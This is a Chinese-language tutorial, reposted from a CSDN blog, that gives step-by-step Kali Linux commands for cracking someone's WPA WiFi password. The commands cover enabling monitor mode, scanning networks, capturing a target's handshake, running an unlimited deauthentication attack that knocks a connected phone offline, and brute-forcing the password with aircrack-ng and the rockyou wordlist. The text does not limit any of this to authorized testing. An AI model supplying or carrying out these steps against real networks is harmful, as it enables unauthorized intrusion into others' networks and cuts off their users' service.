kali linux破解wifi密碼-超詳細過程


前期准備
VMware Workstation虛擬機
在虛擬機安裝好kail linunx系統
無線網卡(芯片為3070或者1887L都支持Linux)
一.打開終端,用airmon-ng命令查看
如果出現無法訪問…沒有那個文件或目錄
解決辦法:先在window主機上按win+r鍵然后輸入services.msc
回車

 

 


找到VMware USB Arbitration Service,雙擊

 

 

1.啟動類型改為自動 …2.啟動服務狀態 …3.確定

二.打開虛擬機的設置,改成跟下圖中2一樣(如果為灰色無法更改,則需要關閉kail系統后再改)

 

 


將usb無線網卡插在電腦上,(注意:網卡芯片為3070或者8187L,買的時候要注意)
點擊 虛擬機 -> 可移動設備 -> 選擇那個有WLAN的 -> 連接

 

 


三.命令ifconfig查看網卡信息,有wlan0表示連接成功

 

 


四.命令airmon-ng start wlan0開啟網卡監聽模式

 

 


五.輸入iwconfig命令查看網卡信息, wlan0mon網卡名加了mon則表示成功

 

 


六.命令airodump-ng wlan0mon,開始掃描WiFi,按ctrl+c結束任務

 

 

BSSID為wifi的MAC地址,PWR為信號強弱程度,數值越小信號越強;#DATA為數據量,越大使用的人就越多,CH為信道頻率(頻道),ESSID為wifi的名稱,中文可能會有亂碼

七,接着輸入airodump-ng --bssid BSSID -c 信道頻率 -w 抓包存儲的路徑 wlan0mon
如:airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home wlan0mon

 

 

數據包已經正在抓取
如果抓取不到數據,新建一個終端:鍵入airepaly-ng -0 0 -c 連接到WiFi的手機mac地址 -a bssid 網卡名(一般為wlan0mon)

如:aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon

 

 

(0 WiFi設備無限次數,-0 8則攻擊8次。攻擊原理是:先讓設備掉線,設備會再自動連接,並發這個自動連接過程會進行三次握手,會發送tcp包(里面包含加密的密碼數據),我方偽裝成WiFi熱點去竊取該數據包。我方竊取后即可用字典窮舉法暴力破解加密的WiFi密碼,
數據包里面的密碼是哈希加密的,哈希加密只能正向)

出現WPA handshake時,表示抓包成功

 

 


兩個終端都按Ctrl+c停止,不然那邊會一直斷網的
cd打開抓包的目錄,ls列出來,就看到我們抓到的數據包

 

 


八.解壓kali自帶的字典文件 路徑:/usr/share/wordlists/rockyou.txt.gz
如 :gzip -d/usr/share/wordlists/rockyou.txt.gz

九.鍵入 aircrack-ng -w 字典路徑 握手包路徑,回車后開始爆破
如:aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap

耐心等待密碼破解吧…
————————————————
版權聲明:本文為CSDN博主「凡塵-追夢者」的原創文章,遵循CC 4.0 BY-SA版權協議,轉載請附上原文出處鏈接及本聲明。
原文鏈接:https://blog.csdn.net/weixin_44545251/article/details/100279827


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM